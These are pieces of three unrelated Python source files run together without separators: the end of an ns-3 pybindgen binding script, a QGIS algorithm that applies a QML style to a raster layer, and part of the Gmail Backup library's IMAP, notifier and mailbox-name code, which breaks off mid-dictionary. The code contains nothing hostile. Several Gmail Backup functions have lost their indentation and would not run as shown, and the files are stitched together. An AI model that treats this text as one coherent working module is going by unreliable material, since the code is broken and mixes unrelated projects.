    ## address.h (module 'network'): ns3::AddressValue::AddressValue(ns3::Address const & value) [constructor]
    cls.add_constructor([param('ns3::Address const &', 'value')])
    ## address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::AddressValue::Copy() const [member function]
    cls.add_method('Copy',
                   'ns3::Ptr< ns3::AttributeValue >',
                   [],
                   is_const=True, is_virtual=True)
    ## address.h (module 'network'): bool ns3::AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
    cls.add_method('DeserializeFromString',
                   'bool',
                   [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   is_virtual=True)
    ## address.h (module 'network'): ns3::Address ns3::AddressValue::Get() const [member function]
    cls.add_method('Get',
                   'ns3::Address',
                   [],
                   is_const=True)
    ## address.h (module 'network'): std::string ns3::AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
    cls.add_method('SerializeToString',
                   'std::string',
                   [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   is_const=True, is_virtual=True)
    ## address.h (module 'network'): void ns3::AddressValue::Set(ns3::Address const & value) [member function]
    cls.add_method('Set',
                   'void',
                   [param('ns3::Address const &', 'value')])
    return
def register_functions(root_module):
    """Register free-function bindings for this module and its submodules."""
    module = root_module
    register_functions_ns3_FatalImpl(module.get_submodule('FatalImpl'), root_module)
    return
def register_functions_ns3_FatalImpl(module, root_module):
    """Register free functions of the ns3::FatalImpl submodule (none generated)."""
    return
def main():
    """Build the binding module description and emit the generated C++ code
    for it to stdout via pybindgen's FileCodeSink."""
    out = FileCodeSink(sys.stdout)
    root_module = module_init()
    register_types(root_module)
    register_methods(root_module)
    register_functions(root_module)
    root_module.generate(out)
# Allow running the generated binding description directly as a script.
if __name__ == '__main__':
    main()
# -*- coding: utf-8 -*-
"""
***************************************************************************
SetRasterStyle.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
import os
from qgis.PyQt.QtXml import QDomDocument
from qgis.core import (QgsProcessingAlgorithm,
QgsProcessingParameterRasterLayer,
QgsProcessingParameterFile,
QgsProcessingOutputRasterLayer)
from processing.algs.qgis.QgisAlgorithm import QgisAlgorithm
class SetRasterStyle(QgisAlgorithm):
    """Processing algorithm that applies a QML style file to a raster layer.

    Deprecated, non-threadable algorithm: it mutates the live layer in the
    current project, so it cannot run in a background thread or in the
    standalone Processing tool.
    """

    INPUT = 'INPUT'
    STYLE = 'STYLE'
    OUTPUT = 'OUTPUT'

    def group(self):
        return self.tr('Raster tools')

    def groupId(self):
        return 'rastertools'

    def __init__(self):
        super().__init__()

    def flags(self):
        # NoThreading: importNamedStyle/triggerRepaint touch the live layer.
        return super().flags() | QgsProcessingAlgorithm.FlagNoThreading | QgsProcessingAlgorithm.FlagDeprecated | QgsProcessingAlgorithm.FlagNotAvailableInStandaloneTool

    def initAlgorithm(self, config=None):
        self.addParameter(QgsProcessingParameterRasterLayer(self.INPUT,
                                                            self.tr('Raster layer')))
        self.addParameter(QgsProcessingParameterFile(self.STYLE,
                                                     self.tr('Style file'), extension='qml'))
        # NOTE: the output is deliberately registered under INPUT — the
        # algorithm returns the (restyled) input layer itself.
        self.addOutput(QgsProcessingOutputRasterLayer(self.INPUT, self.tr('Styled')))

    def name(self):
        return 'setstyleforrasterlayer'

    def displayName(self):
        return self.tr('Set style for raster layer')

    def processAlgorithm(self, parameters, context, feedback):
        """Load the QML file, import it as the layer's named style and repaint."""
        layer = self.parameterAsRasterLayer(parameters, self.INPUT, context)
        style = self.parameterAsFile(parameters, self.STYLE, context)
        with open(style) as f:
            # read() replaces the wasteful "".join(f.readlines())
            xml = f.read()
        d = QDomDocument()
        d.setContent(xml)
        layer.importNamedStyle(d)
        layer.triggerRepaint()
        return {self.INPUT: layer}
#!/usr/bin/env python2.5
# -*- coding: utf-8 -*-
#
# Gmail Backup library
#
# Copyright © 2008, 2009, 2010 Jan Svec <honza.svec@gmail.com> and Filip Jurcicek <filip.jurcicek@gmail.com>
#
# This file is part of Gmail Backup.
#
# Gmail Backup is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# Gmail Backup is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along
# with Gmail Backup. If not, see <http://www.gnu.org/licenses/
#
# See LICENSE file for license details
import os
import sys
import imaplib
import socket
import zipfile
import email
import email.Utils
import email.Header
import email.Iterators
import email.Header
import email.Generator
import email.Errors
import sys
if sys.version_info[:2] >= (2, 5):
import email.utils
import email.header
import email.iterators
import email.header
import email.generator
import email.errors
import time
import datetime
import re
import codecs
import socket
import traceback
import shutil
import urllib
import zipfile
import string
import unicodedata
import gettext
try:
from hashlib import md5
except ImportError:
from md5 import md5
# Subversion keyword strings; in a real checkout these expand to e.g.
# '$Revision: 123 $' and are trimmed to the bare value just below.
GMB_REVISION = u'$Revision$'
GMB_DATE = u'$Date$'
GMB_REVISION = GMB_REVISION[11:-2]  # strip '$Revision: ' prefix and ' $' suffix
GMB_DATE = GMB_DATE[7:-2].split()[0]  # keep only the date part of '$Date: ... $'
SPEED_AVERAGE_TIME = 21 # speed average over the last x seconds
SOCKET_TIMEOUT = 60 # timeout for socket operations
MAX_LABEL_RETRIES = 5  # presumably retries when applying labels — used further down
VERSION_URL = 'http://code.google.com/p/gmail-backup-com/source/list'
SLEEP_FOR = 20 # After network error sleep for X seconds
MAX_TRY = 5 # Maximum number of reconnects
# Translations ship next to the executable; install() makes _() a builtin.
MESSAGES_DIR = os.path.join(os.path.dirname(sys.argv[0]), 'messages')
gettext.install('gmail-backup', MESSAGES_DIR, unicode=1)
def _onlyAscii(string):
    """Force `string` (str or unicode) into a pure-ASCII byte string,
    replacing characters that do not fit with '?' (Python 2 semantics)."""
    if isinstance(string, unicode):
        return string.encode('ascii', 'replace')
    else:
        # round-trip through decode to normalise non-ASCII bytes as well
        return string.decode('ascii', 'replace').encode('ascii', 'replace')
def _parseMsgId(msg):
    """Return a stable ASCII identifier for a parsed email message.

    Uses the Message-Id header (angle brackets stripped) when present;
    otherwise synthesises 'From.Subject.md5(body)' so the id is still
    deterministic for identical messages.
    """
    msg_id = msg['Message-Id']
    if not msg_id:
        from_ = msg['From']
        subj = msg['Subject']
        # renamed from `hash`, which shadowed the builtin
        digest = md5()
        digest.update(msg.as_string())
        msg_id = '%s.%s.%s' % (from_, subj, digest.hexdigest())
    else:
        msg_id = msg_id.lstrip('<').rstrip('>')
    msg_id = _onlyAscii(msg_id)
    return msg_id
def _getMailInternalId(mail):
    """Parse the raw RFC 822 text `mail` and return its stable identifier."""
    return _parseMsgId(email.message_from_string(mail))
def _getMailDate(mail):
    """Parse the raw RFC 822 text `mail` and return its clamped Date tuple."""
    return _parseMsgDate(email.message_from_string(mail))
def _getMailIMAPDate(mail):
    """Parse raw RFC 822 text and return its Date as an IMAP internal date string."""
    parsed = email.message_from_string(mail)
    return imaplib.Time2Internaldate(_parseMsgDate(parsed))
def _convertTime(t):
t = time.mktime(time.strptime(t, '%Y%m%d'))
return imaplib.Time2Internaldate(t)
def _convertTimeToNum(t):
t = time.mktime(time.strptime(t, '%Y%m%d'))
return t
def _unicodeHeader(hdr):
    """Decode an RFC 2047 encoded message header into a unicode string.

    Each chunk is decoded with its declared charset; chunks whose charset
    is missing, unknown or wrong fall back to ASCII with replacement
    characters.  Any other failure yields a placeholder string.
    """
    try:
        ret = []
        for item, enc in email.Header.decode_header(hdr):
            try:
                if enc is not None:
                    ret.append(item.decode(enc))
                else:
                    ret.append(item.decode('ascii', 'replace'))
            # BUG FIX: the original `except UnicodeDecodeError, LookupError:`
            # caught only UnicodeDecodeError and bound it to the name
            # LookupError (Python 2 semantics); a tuple is required to
            # also catch LookupError from an unknown charset.
            except (UnicodeDecodeError, LookupError):
                ret.append(item.decode('ascii', 'replace'))
        return ''.join(ret)
    except Exception:
        # deliberate best-effort: never let a malformed header crash a backup
        return _('<unparseable header>')
def _getMsgInitials(msg):
    '''Returns from_address and subject for parsed `email` message
    (both decoded to unicode via _unicodeHeader).
    '''
    from_address = _unicodeHeader(msg['From'])
    # why: collapse 'Display Name <addr@host.tld>' to the bare address
    match = re.match(r"^.*<(.*@.*\..*)>.*$", from_address)
    if match:
        from_address = match.group(1)
    subject = _unicodeHeader(msg['Subject'])
    return from_address, subject
def _getMailInitials(mail):
    """Parse raw RFC 822 text and return its (from_address, subject) pair."""
    return _getMsgInitials(email.message_from_string(mail))
def _trimDate(d):
def trim(mi, va, ma):
if va < mi:
return mi
elif va > ma:
return ma
else:
return va
(tm_year, tm_mon, tm_mday, tm_hour, tm_min, tm_sec, tm_wday, tm_yday, tm_isdst) = d
tm_year = trim(1970, tm_year, 9999)
tm_mon = trim(1, tm_mon, 12)
tm_mday = trim(1, tm_mday, 31)
tm_hour = trim(0, tm_hour, 23)
tm_min = trim(0, tm_min, 59)
tm_sec = trim(0, tm_sec, 59)
tm_yday = trim(1, tm_yday, 366)
if tm_isdst not in [-1, 0, 1]:
tm_isdst = -1
d = (tm_year, tm_mon, tm_mday, tm_hour, tm_min, tm_sec, tm_wday, tm_yday, tm_isdst)
try:
# We will try to construct the time
time.mktime(d)
except OverflowError:
# If overflow error occurs, we will fallback to 0
d = time.localtime(0)
return d
def _parseMsgDate(msg):
    """Parse a message's Date header into a clamped 9-tuple.

    Falls back to the epoch when the header is missing or unparseable,
    then clamps the result through _trimDate.
    """
    d = email.Utils.parsedate(msg['Date'])
    if d is None:
        d = time.localtime(0)
    d = _trimDate(d)
    return d
def _revertDict(d):
    """Return a new dict with keys and values of `d` swapped.
    NOTE(review): duplicate values collapse into one key — callers
    presumably rely on the values being unique.
    """
    return dict((v, k) for (k, v) in d.iteritems())
def _shiftDates(min_date, max_date):
    """Widen the interval [min_date, max_date] by one day on each side.

    Both bounds are clamped via _trimDate before and after the shift;
    a bound whose timestamp arithmetic raises ValueError is left unshifted.
    """
    min_date = _trimDate(min_date)
    max_date = _trimDate(max_date)
    shift_ts = 24*60*60 # one day in seconds (previous comment wrongly said "1 hour")
    try:
        min_t = time.localtime(time.mktime(min_date)-shift_ts)
    except ValueError:
        min_t = time.localtime(time.mktime(min_date))
    try:
        max_t = time.localtime(time.mktime(max_date)+shift_ts)
    except ValueError:
        max_t = time.localtime(time.mktime(max_date))
    min_t = _trimDate(min_t)
    max_t = _trimDate(max_t)
    return min_t, max_t
def imap_decode(s):
    """Decode an IMAP modified-UTF-7 mailbox name into unicode.

    '&-' decodes to a literal '&'; other '&...-' runs are decoded by
    rewriting them as standard UTF-7 ('+...-' with ',' mapped back to '/').
    """
    def sub(m):
        ss = m.groups(1)[0]
        if not ss:
            return '&'
        else:
            ss = ('+'+ss+'-').replace(',', '/')
            return ss.decode('utf-7')
    return re.sub('&(.*?)-', sub, s)
def imap_encode(s):
    """Encode a unicode mailbox name into IMAP modified UTF-7.

    A literal '&' becomes '&-'; any run of characters outside the
    printable-ASCII subset is UTF-7 encoded with '+' mapped to '&'
    and '/' mapped to ','.
    """
    def sub(m):
        ss = m.groups(1)[0]
        if ss == '&':
            return '&-'
        else:
            ss = ss.encode('utf-7').replace('+', '&').replace('/', ',')
            return ss
    return re.sub('([^\x20-\x25\x27-\x7e]+|&)', sub, s).encode('ascii', 'replace')
def imap_unescape(s):
    """Undo IMAP quoted-string escaping: '\\\\' -> '\\' and '\\"' -> '"'."""
    return re.sub(r'\\([\\"])', lambda m: m.group(1), s)
def imap_escape(s):
    """Apply IMAP quoted-string escaping: prefix each '\\' or '"' with '\\'."""
    return re.sub(r'([\\"])', lambda m: '\\' + m.group(1), s)
def _removeDiacritics(string):
    '''Removes any diacritics from `string`.

    NFKD normalisation splits each accented character into its base
    character plus combining marks; the combining marks are then dropped.
    Returns a unicode string.
    '''
    if not isinstance(string, unicode):
        string = unicode(string)
    string = unicodedata.normalize('NFKD', string)
    # ''.join over a generator replaces the original quadratic `output += c` loop
    return ''.join(c for c in string if not unicodedata.combining(c))
class GBNotifier(object):
    """No-op progress/event notifier interface for backup and restore runs.

    Concrete notifiers (e.g. ConsoleNotifier) override the subset of
    callbacks they care about.  ``n*`` methods are event callbacks;
    ``get*``/``updateSpeed`` expose transfer statistics.  ``end`` flags
    distinguish the start (False) from the end (True) of an operation.
    """
    def nVersion(self):
        pass
    def nSpeed(self, amount, d):
        # `amount` bytes transferred over `d` seconds
        pass
    def nBackup(self, end, mailbox, directory):
        pass
    def nRestore(self, end, mailbox, directory):
        pass
    def nClear(self, end, mailbox):
        pass
    def nEmailBackup(self, from_address, subject, num, total):
        pass
    def nEmailBackupSkip(self, num, total, skipped, total_to_skip):
        pass
    def nEmailRestore(self, from_address, subject, num, total):
        pass
    def nEmailRestoreSkip(self, from_address, subject, num, total):
        pass
    def nLabelsBackup(self, end):
        pass
    def nLabelsRestore(self, num, total):
        pass
    def nError(self, msg):
        pass
    def nLog(self, msg):
        pass
    def nException(self, type, error, tb):
        # (type, error, tb) as returned by sys.exc_info()
        pass
    def nExceptionFull(self, type, error, tb):
        pass
    def nExceptionMsg(self, msg, type, error, tb):
        pass
    def getSpeed(self):
        pass
    def getTotal(self):
        pass
    def getPercentage(self):
        pass
    def updateSpeed(self):
        pass
class ConsoleNotifier(GBNotifier):
    """Notifier that reports progress, errors and speed on stdout.

    Keeps a sliding window of (bytes, seconds) samples for the speed
    average and a running byte total.  Unicode-unsafe terminals are
    handled by falling back to ASCII with replacement characters.
    """
    # Exceptions that must abort the whole run instead of being logged.
    FATAL_ERRORS = [socket.error, imaplib.IMAP4.abort, imaplib.IMAP4.error, KeyboardInterrupt]
    def __init__(self, *args, **kwargs):
        super(ConsoleNotifier, self).__init__(*args, **kwargs)
        self._resetCounters()
    def _resetCounters(self):
        # _speed: newest-first list of (bytes, seconds) samples
        self._speed = []
        self._total = 0
        self._percentage = None
    def uprint(self, msg):
        """Print a line, degrading to ASCII on terminals that reject unicode."""
        try:
            print msg
        except UnicodeEncodeError:
            print msg.encode('ascii', 'replace')
        sys.stdout.flush()
    def uprint2(self, msg):
        """Print an in-place status line (carriage return, no newline);
        suppressed when stdout is not a terminal."""
        if not sys.stdout.isatty():
            return
        try:
            print '\r%s \r' % (msg, ),
        except UnicodeEncodeError:
            print '\r%s \r' % (msg.encode('ascii', 'replace'), ),
        sys.stdout.flush()
    def nVersion(self):
        self.nLog(_("GMail Backup revision %s (%s)") % (GMB_REVISION, GMB_DATE))
    def nSpeed(self, amount, d):
        # record the sample, then drop samples older than the averaging window
        self._total += amount
        self._speed.insert(0, (amount, d))
        d_sum = 0
        for idx, (a, d) in enumerate(self._speed):
            d_sum += d
            if d_sum > SPEED_AVERAGE_TIME:
                break
        del self._speed[idx+1:]
        self.updateSpeed()
    def getSpeed(self):
        """Average transfer speed over the window, in KiB/s."""
        a_sum = 0
        d_sum = 0
        for a, d in self._speed:
            d_sum += d
            a_sum += a
        if d_sum == 0:
            return 0
        else:
            return (a_sum/d_sum)/1024.
    def getTotal(self):
        """Total transferred so far, in MiB."""
        return self._total/1024./1024.
    def getPercentage(self):
        return self._percentage
    def updateSpeed(self):
        self.uprint2(_("%1.fKB/s (total: %.2fMB)") % (self.getSpeed(), self.getTotal()))
    def nBackup(self, end, mailbox, directory):
        if not end:
            self._resetCounters()
        if not end:
            self.uprint(_("Starting backup of account %s into %s") % (mailbox, directory))
        else:
            self.uprint(_("Ending backup of account %s") % (mailbox, ))
    def nRestore(self, end, mailbox, directory):
        if not end:
            self._resetCounters()
        if not end:
            self.uprint(_("Restoring the content of account %s from %s") % (mailbox, directory))
        else:
            self.uprint(_("End of restoring of account %s") % (mailbox, ))
    def nClear(self, end, mailbox):
        if not end:
            self.uprint(_("Clearing the content of account %s") % (mailbox, ))
        else:
            self.uprint(_("End of clearing of account %s") % (mailbox, ))
    def nEmailBackup(self, from_address, subject, num, total):
        self._percentage = float(num)/total*100
        self.uprint(_("Stored %4.1f%% (%d of %d): %s - %s") % (self._percentage, num, total, from_address, subject))
    def nEmailBackupSkip(self, num, total, skipped, total_to_skip):
        self._percentage = float(num)/total*100
        self.uprint(_("Skip %4.1f%% (%d of %d): message already stored") % (self._percentage, num, total))
    def nEmailRestore(self, from_address, subject, num, total):
        self._percentage = float(num)/total*100
        self.uprint(_("Restored %4.1f%%: %s - %s") % (self._percentage, from_address, subject))
    def nEmailRestoreSkip(self, from_address, subject, num, total):
        self._percentage = float(num)/total*100
        self.uprint(_("Skipdate %4.1f%%: %s - %s") % (self._percentage, from_address, subject))
    def nLabelsBackup(self, end):
        if not end:
            self.uprint(_("Starting backup of labels"))
        else:
            self.uprint(_("Backup of labels ended"))
    def nLabelsRestore(self, num, total):
        self.uprint(_("Restoring labels, %.1f%%") % (float(num)/total*100, ))
    def nError(self, msg):
        self.uprint(_('Error: %s') % msg)
    def nLog(self, msg):
        self.uprint(unicode(msg))
    def nException(self, type, error, tb):
        """Render a caught exception; known network/IMAP errors get a short
        message, anything else gets the full traceback."""
        if isinstance(error, socket.error):
            #num, message = error
            self.nError(_('%s\nThere are network problems, please, try it later') % (error, ))
        elif isinstance(error, imaplib.IMAP4.abort):
            self.nError(_("IMAP aborted the transfer"))
        elif isinstance(error, imaplib.IMAP4.error):
            self.nError(_("IMAP: %s") % error.message)
        elif isinstance(error, KeyboardInterrupt):
            self.nLog(_("Program interrupted by user"))
        else:
            self.nExceptionFull(type, error, tb)
    def nExceptionFull(self, type, error, tb):
        t = ''.join(traceback.format_exception(type, error, tb))
        self.nError(_("Error occured, full traceback is bellow (gmb.py revision %s)\n%s") % (GMB_REVISION, t))
    def nExceptionMsg(self, msg, type, error, tb):
        t = ''.join(traceback.format_exception(type, error, tb))
        self.nError(_("%s\nIgnoring this error message.\nIf you want, please report the following traceback to gmail-backup-com-users@googlegroups.com \nThanks! (gmb.py revision %s):\n%s") % (msg, GMB_REVISION, t))
    def handleError(self, msg):
        """Report the current exception unless it is fatal, in which case
        it is re-raised for the caller to handle."""
        e_type, e_value, e_tb = sys.exc_info()
        for e in self.FATAL_ERRORS:
            if isinstance(e_value, e):
                raise
        self.nExceptionMsg(msg, e_type, e_value, e_tb)
class MyIMAP4_SSL(imaplib.IMAP4_SSL):
    '''Hack for bad implementation of sock._recv() under windows.

    Reads and writes are chunked (32 KiB) so each chunk's size and
    duration can be reported to an attached notifier for speed stats.
    '''
    def open(self, *args, **kwargs):
        imaplib.IMAP4_SSL.open(self, *args, **kwargs)
        # why: a timeout makes a stalled connection fail instead of hanging
        self.sock.settimeout(SOCKET_TIMEOUT)
        self._t1 = time.time()
    def setNotifier(self, notifier):
        # optional; _nSpeed is a no-op until this is called
        self.notifier = notifier
    def _nSpeed(self, t1, t2, amount):
        if hasattr(self, 'notifier'):
            d = t2 - t1
            self.notifier.nSpeed(amount, d)
    def read(self, size):
        """Read `size` bytes in 32 KiB chunks, reporting each chunk's speed."""
        step = 1024 * 32
        ret = []
        while size > 0:
            part = imaplib.IMAP4_SSL.read(self, min(size, step))
            t2 = time.time()
            ret.append(part)
            self._nSpeed(self._t1, t2, len(part))
            self._t1 = t2
            size -= step
        return ''.join(ret)
    def send(self, data):
        """Send `data` in 32 KiB chunks, reporting each chunk's speed."""
        step = 1024 * 32
        idx = 0
        while idx < len(data):
            part = data[idx:idx+step]
            imaplib.IMAP4_SSL.send(self, part)
            t2 = time.time()
            self._nSpeed(self._t1, t2, len(part))
            self._t1 = t2
            idx += step
class GMailConnection(object):
    '''IMAP connection to Gmail that knows the localized special mailboxes.

    Holds the credentials, resolves the localized names of the
    "[Gmail]/All Mail" and "[Gmail]/Trash" mailboxes, and transparently
    reconnects (replaying the last select/search) when the link drops.
    '''
    # Localized names of the two special mailboxes; filled in by setLanguage().
    ALL_MAILS = None
    TRASH = None
    OK = 'OK'
    # Internal language code -> (all-mail mailbox, trash mailbox).
    # Non-ASCII mailbox names are written in IMAP modified UTF-7 (RFC 3501).
    MAILBOX_NAMES = {
        'en_us': ('[Gmail]/All Mail', '[Gmail]/Trash'),
        'en_uk': ('[Gmail]/All Mail', '[Gmail]/Bin'),
        'cs': ('[Gmail]/V&AWE-echny zpr&AOE-vy', '[Gmail]/Ko&AWE-'),
        'es': ('[Gmail]/Todos', '[Gmail]/Papelera'),
        'de': ('[Gmail]/Alle Nachrichten', '[Gmail]/Papierkorb'),
        'fr': ('[Gmail]/Tous les messages', '[Gmail]/Corbeille'),
        'ar': ('[Gmail]/&BkMGRA- &BicGRAYoBjEGSgYv-', '[Gmail]/&BkUGRwZABkUGRAYnBio-'),
        'it': ('[Gmail]/Tutti i messaggi', '[Gmail]/Cestino'),
        'pl': ('[Gmail]/Wszystkie', '[Gmail]/Kosz'),
        'sk': ('[Gmail]/V&AWE-etky spr&AOE-vy', '[Gmail]/K&APQBYQ-'),
        'bahasa_indonesia': ('[Gmail]/Semua Email', '[Gmail]/Tong Sampah'),
        'bahasa_melayu': ('[Gmail]/Semua Mel', '[Gmail]/Sampah'),
        'catala': ('[Gmail]/Tots els missatges', '[Gmail]/Paperera'),
        'dansk': ('[Gmail]/Alle e-mails', '[Gmail]/Papirkurv'),
        'eesti_keel': ('[Gmail]/K&APU-ik kirjad', '[Gmail]/Pr&APw-gikast'),
        'filipino': ('[Gmail]/Lahat ng Mail', '[Gmail]/Basurahan'),
        'hrvatski': ('[Gmail]/Sva po&AWE-ta', '[Gmail]/Otpad'),
        'islenska': ('[Gmail]/Allur p&APM-stur', '[Gmail]/Rusl'),
        'latviesu': ('[Gmail]/Visas v&ARM-stules', '[Gmail]/Miskaste'),
        'lietuviu': ('[Gmail]/Visi lai&AWE-kai', '[Gmail]/&AWA-iuk&AWE-liad&ARcBfgEX-'),
        'magyar': ('[Gmail]/&ANY-sszes lev&AOk-l', '[Gmail]/Kuka'),
        'norsk': ('[Gmail]/All e-post', '[Gmail]/Papirkurv'),
        'nederlands': ('[Gmail]/Alle berichten', '[Gmail]/Prullenbak'),
        'portugues_brazil': ('[Gmail]/Todos os e-mails', '[Gmail]/Lixeira'),
        'portugues_portugal': ('[Gmail]/Todo o correio', '[Gmail]/Lixo'),
        'romana': ('[Gmail]/Toate mesajele', '[Gmail]/Co&AV8- de gunoi'),
        'slovenscina': ('[Gmail]/Vsa po&AWE-ta', '[Gmail]/Smetnjak'),
        'suomi': ('[Gmail]/Kaikki viestit', '[Gmail]/Roskakori'),
        'svenska': ('[Gmail]/Alla mail', '[Gmail]/Papperskorgen'),
        'tieng_viet': ('[Gmail]/T&AOIDAQ-t ca&Awk- Th&AbA-', '[Gmail]/Thu&AwA-ng Ra&AwE-c'),
        'turkce': ('[Gmail]/T&APw-m Postalar', '[Gmail]/&AMcA9g-p Kutusu'),
        'ellnvika': ('[Gmail]/&A4wDuwOx- &A8QDsQ- &A7wDtwO9A80DvAOxA8QDsQ-', '[Gmail]/&A5oDrAO0A78Dwg- &A7EDwAO,A8EDwQO5A7wDvAOsA8QDyQO9-'),
        'azbuka1': ('[Gmail]/&BBIEQQRP- &BD8EPgRHBEIEMA-', '[Gmail]/&BBoEPgRABDcEOAQ9BDA-'),
        'azbuka2': ('[Gmail]/&BCEEMgQw- &BD8EPgRIBEIEMA-', '[Gmail]/&BB4EQgQ,BDAENA-'),
        'azbuka3': ('[Gmail]/&BCMEQQRP- &BD8EPgRIBEIEMA-', '[Gmail]/&BBoEPgRIBDgEOg-'),
        'azbuka4': ('[Gmail]/&BCYETwQ7BDAEQgQw- &BD8EPgRJBDA-', '[Gmail]/&BBoEPgRIBEcENQ-'),
        'hebrew': ('[Gmail]/&BdsF3A- &BdQF0wXVBdAF6A-', '[Gmail]/&BdAF6QXkBdQ-'),
        'arabic': ('[Gmail]/&BkMGRA- &BicGRAYoBjEGSgYv-', '[Gmail]/&BkUGRwZABkUGRAYnBio-'),
        'caj1': ('[Gmail]/&CTgJLQlA- &CS4JRwky-', '[Gmail]/&CR8JTQkwCUgJNg- &CRUJMAlHCQI-'),
        'caj2': ('[Gmail]/&DggOFA4rDiEOMg4iDhcOMQ5JDgcOKw4hDhQ-', '[Gmail]/&DhYOMQ4HDgIOIg4w-'),
        'caj3': ('[Gmail]/&UWiQ6JD1TvY-', '[Gmail]/&V4NXPmh2-'),
        'caj4': ('[Gmail]/&YkBnCZCuTvY-', '[Gmail]/&XfJSIJZkkK5O9g-'),
        'caj5': ('[Gmail]/&MFkweTBmMG4w4TD8MOs-', '[Gmail]/&MLQw33ux-'),
        'caj6': ('[Gmail]/&yATMtLz0rQDVaA-', '[Gmail]/&1zTJwNG1-'),
        # The same with Google Mail instead of Gmail
        'en_us_GM': ('[Google Mail]/All Mail', '[Google Mail]/Trash'),
        'en_uk_GM': ('[Google Mail]/All Mail', '[Google Mail]/Bin'),
        'cs_GM': ('[Google Mail]/V&AWE-echny zpr&AOE-vy', '[Google Mail]/Ko&AWE-'),
        'es_GM': ('[Google Mail]/Todos', '[Google Mail]/Papelera'),
        'de_GM': ('[Google Mail]/Alle Nachrichten', '[Google Mail]/Papierkorb'),
        'fr_GM': ('[Google Mail]/Tous les messages', '[Google Mail]/Corbeille'),
        'ar_GM': ('[Google Mail]/&BkMGRA- &BicGRAYoBjEGSgYv-', '[Google Mail]/&BkUGRwZABkUGRAYnBio-'),
        'it_GM': ('[Google Mail]/Tutti i messaggi', '[Google Mail]/Cestino'),
        'pl_GM': ('[Google Mail]/Wszystkie', '[Google Mail]/Kosz'),
        'sk_GM': ('[Google Mail]/V&AWE-etky spr&AOE-vy', '[Google Mail]/K&APQBYQ-'),
        'bahasa_indonesia_GM': ('[Google Mail]/Semua Email', '[Google Mail]/Tong Sampah'),
        'bahasa_melayu_GM': ('[Google Mail]/Semua Mel', '[Google Mail]/Sampah'),
        'catala_GM': ('[Google Mail]/Tots els missatges', '[Google Mail]/Paperera'),
        'dansk_GM': ('[Google Mail]/Alle e-mails', '[Google Mail]/Papirkurv'),
        'eesti_keel_GM': ('[Google Mail]/K&APU-ik kirjad', '[Google Mail]/Pr&APw-gikast'),
        'filipino_GM': ('[Google Mail]/Lahat ng Mail', '[Google Mail]/Basurahan'),
        'hrvatski_GM': ('[Google Mail]/Sva po&AWE-ta', '[Google Mail]/Otpad'),
        'islenska_GM': ('[Google Mail]/Allur p&APM-stur', '[Google Mail]/Rusl'),
        'latviesu_GM': ('[Google Mail]/Visas v&ARM-stules', '[Google Mail]/Miskaste'),
        'lietuviu_GM': ('[Google Mail]/Visi lai&AWE-kai', '[Google Mail]/&AWA-iuk&AWE-liad&ARcBfgEX-'),
        'magyar_GM': ('[Google Mail]/&ANY-sszes lev&AOk-l', '[Google Mail]/Kuka'),
        'norsk_GM': ('[Google Mail]/All e-post', '[Google Mail]/Papirkurv'),
        'nederlands_GM': ('[Google Mail]/Alle berichten', '[Google Mail]/Prullenbak'),
        'portugues_brazil_GM': ('[Google Mail]/Todos os e-mails', '[Google Mail]/Lixeira'),
        'portugues_portugal_GM': ('[Google Mail]/Todo o correio', '[Google Mail]/Lixo'),
        'romana_GM': ('[Google Mail]/Toate mesajele', '[Google Mail]/Co&AV8- de gunoi'),
        'slovenscina_GM': ('[Google Mail]/Vsa po&AWE-ta', '[Google Mail]/Smetnjak'),
        'suomi_GM': ('[Google Mail]/Kaikki viestit', '[Google Mail]/Roskakori'),
        'svenska_GM': ('[Google Mail]/Alla mail', '[Google Mail]/Papperskorgen'),
        'tieng_viet_GM': ('[Google Mail]/T&AOIDAQ-t ca&Awk- Th&AbA-', '[Google Mail]/Thu&AwA-ng Ra&AwE-c'),
        'turkce_GM': ('[Google Mail]/T&APw-m Postalar', '[Google Mail]/&AMcA9g-p Kutusu'),
        'ellnvika_GM': ('[Google Mail]/&A4wDuwOx- &A8QDsQ- &A7wDtwO9A80DvAOxA8QDsQ-', '[Google Mail]/&A5oDrAO0A78Dwg- &A7EDwAO,A8EDwQO5A7wDvAOsA8QDyQO9-'),
        'azbuka1_GM': ('[Google Mail]/&BBIEQQRP- &BD8EPgRHBEIEMA-', '[Google Mail]/&BBoEPgRABDcEOAQ9BDA-'),
        'azbuka2_GM': ('[Google Mail]/&BCEEMgQw- &BD8EPgRIBEIEMA-', '[Google Mail]/&BB4EQgQ,BDAENA-'),
        'azbuka3_GM': ('[Google Mail]/&BCMEQQRP- &BD8EPgRIBEIEMA-', '[Google Mail]/&BBoEPgRIBDgEOg-'),
        'azbuka4_GM': ('[Google Mail]/&BCYETwQ7BDAEQgQw- &BD8EPgRJBDA-', '[Google Mail]/&BBoEPgRIBEcENQ-'),
        'hebrew_GM': ('[Google Mail]/&BdsF3A- &BdQF0wXVBdAF6A-', '[Google Mail]/&BdAF6QXkBdQ-'),
        'arabic_GM': ('[Google Mail]/&BkMGRA- &BicGRAYoBjEGSgYv-', '[Google Mail]/&BkUGRwZABkUGRAYnBio-'),
        'caj1_GM': ('[Google Mail]/&CTgJLQlA- &CS4JRwky-', '[Google Mail]/&CR8JTQkwCUgJNg- &CRUJMAlHCQI-'),
        'caj2_GM': ('[Google Mail]/&DggOFA4rDiEOMg4iDhcOMQ5JDgcOKw4hDhQ-', '[Google Mail]/&DhYOMQ4HDgIOIg4w-'),
